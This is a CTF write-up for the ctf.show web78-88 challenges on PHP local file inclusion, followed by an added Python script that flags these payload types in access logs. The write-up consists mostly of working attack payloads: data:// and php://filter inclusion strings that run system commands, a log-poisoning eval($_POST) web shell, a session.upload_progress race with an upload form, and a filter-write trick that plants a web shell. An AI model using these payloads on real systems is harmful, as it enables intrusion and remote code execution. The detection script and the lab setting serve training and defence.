web78
payload
/?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
Method two
payload
/?file=php://filter/convert.base64-encode/resource=flag.php
web79
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdubCBmbGFnLnBocCcpOw==
web80-81
?file=/var/log/nginx/access.log
Once you find that the log file can be read, use log inclusion
<?php eval($_POST[a]);?>
Method two
<?php system('ls');?>
<?php system('tac fl0g.php');?>
web82-86
These challenges use session.upload_progress to achieve file inclusion
First write an upload form
Note: remember to change the URL
<!DOCTYPE html>
<html>
<body>
<form action="http://c1506ed9-d1e0-427c-8bb7-35fee4dccad6.chall.ctf.show/" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
Capture the request and modify it
PHPSESSID=flag
<?php system('ls');?>
Send it to Intruder
Capture again
?file=/tmp/sess_flag
Write a loop to brute-force it
for i in range(100000):
    print(i)
Start brute-forcing the request captured earlier and this one at the same time
Modify the payload and continue
<?php system('cat fl0g.php');?>
web87
This challenge closely resembles a competition problem
URL-encode php://filter/write=convert.base64-decode/resource=123.php twice
Then write the base64-encoded one-liner (PD9waHAgQGV2YWwoJF9QT1NUW2FdKTs/Pg==) into content
Two characters must be prepended to the content value here: base64 decodes in groups of 4 bytes, so adding 2 characters makes 8 in total
You can also connect with AntSword
web88
payload:?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmwwZy5waHAnKTsg
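As an added detection example (not from this writeup), the Python script below classifies the `file` parameter of access-log requests into the payload families used across web78-88, undoing the double URL encoding seen in web87; the log lines, timestamps and client addresses are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Payload families from this writeup, matched against the decoded `file` value;
# the filter write form is listed before the generic filter read so it wins.
RULES = [
    ("data-wrapper", re.compile(r"^data:", re.I)),
    ("filter-write", re.compile(r"^php://filter/.*write=", re.I)),
    ("filter-read", re.compile(r"^php://filter/", re.I)),
    ("session-upload-progress", re.compile(r"^/tmp/sess_", re.I)),
    ("log-inclusion", re.compile(r"^/var/log/", re.I)),
]
# Common-format access log: client address, timestamp, method and request target.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

def normalize(value, rounds=3):
    """Undo repeated URL encoding (web87 double-encodes the php://filter URL)."""
    for _ in range(rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def classify_lfi(request_target, param="file"):
    """Name the payload family carried by `param`, or None if nothing matches."""
    for pair in urlsplit(request_target).query.split("&"):
        key, _, raw = pair.partition("=")  # split before decoding: values hold '='
        if unquote(key) != param:
            continue
        value = normalize(raw)
        for name, pattern in RULES:
            if pattern.search(value):
                return name
    return None

def scan_log(lines):
    """Return (client_ip, family) for each access-log line carrying a known payload."""
    matches = [m for m in map(LOG_RE.match, lines) if m]
    pairs = [(m.group(1), classify_lfi(m.group(2))) for m in matches]
    return [(ip, family) for ip, family in pairs if family]

# Constructed sample lines mirroring the requests used across web78-88.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?file=data://text/plain;base64,PD9waHA HTTP/1.1" 200 12',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?file=php://filter/convert.base64-encode/resource=flag.php HTTP/1.1" 200 12',
    '10.0.0.6 - - [01/Jan/2024:10:00:02 +0000] "GET /?file=/var/log/nginx/access.log HTTP/1.1" 200 12',
    '10.0.0.6 - - [01/Jan/2024:10:00:03 +0000] "GET /?file=/tmp/sess_flag HTTP/1.1" 404 0',
    '10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /?file=%2570hp%253A%252F%252Ffilter%252Fwrite%253Dconvert.base64-decode%252Fresource%253D123.php HTTP/1.1" 200 12',
    '10.0.0.8 - - [01/Jan/2024:10:00:05 +0000] "GET /?file=about.php HTTP/1.1" 200 12',
]
```

Running `scan_log(SAMPLE_LOG)` flags the first five constructed lines with their family and leaves the plain `about.php` request alone.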
FROM:浅浅淡淡[hellohy]